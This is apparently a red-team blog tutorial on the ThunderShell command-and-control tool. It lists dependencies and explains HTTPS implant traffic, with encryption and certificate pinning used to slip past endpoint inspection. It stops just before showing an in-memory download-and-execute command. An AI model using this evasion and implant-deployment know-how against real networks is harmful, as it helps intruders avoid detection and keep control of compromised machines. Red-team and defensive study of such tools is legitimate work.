Command and Control – HTTPS

Command and control tools usually rely on a variety of protocols as a communication mechanism such as DNS, ICMP, HTTPS etc. Most endpoint products perform some deep packet inspection in order to drop any arbitrary connections. Using a protocol that supports encryption and pin the generated traffic with a certificate can evade the majority of the products and it should be considered as a method during red team engagement.

ThunderShell was developed by MrUn1k0d3r and it is based in Python. It uses a Redis server for HTTPS communication between the implant and the server and PowerShell for execution of the implant on the target and any other scripts. The main advantage is that supports certificate pinning for bypassing security products that perform traffic inspection. A similar tool that uses HTTPS as a communication protocol and PowerShell is called PoshC2.

ThunderShell has the following dependencies:

apt install redis-server
apt install python-redis

The default.json file contains the tool configuration where traffic encryption can be enabled by setting an encryption key and pinned with a certificate to avoid detection.

ThunderShell – Configuration

When ThunderShell is executed it will start a web server which by default will listen on port 8080. The web server will handle all the HTTP requests from the implants.

ThunderShell – Console

The implant (PS-RemoteShell) needs to be hosted on a webserver that is controlled by the red team. The implant requires the following parameters:

IP – Webserver

Port – Webserver

Encryption Key

Delay

The following command will download and execute the implant directly from memory.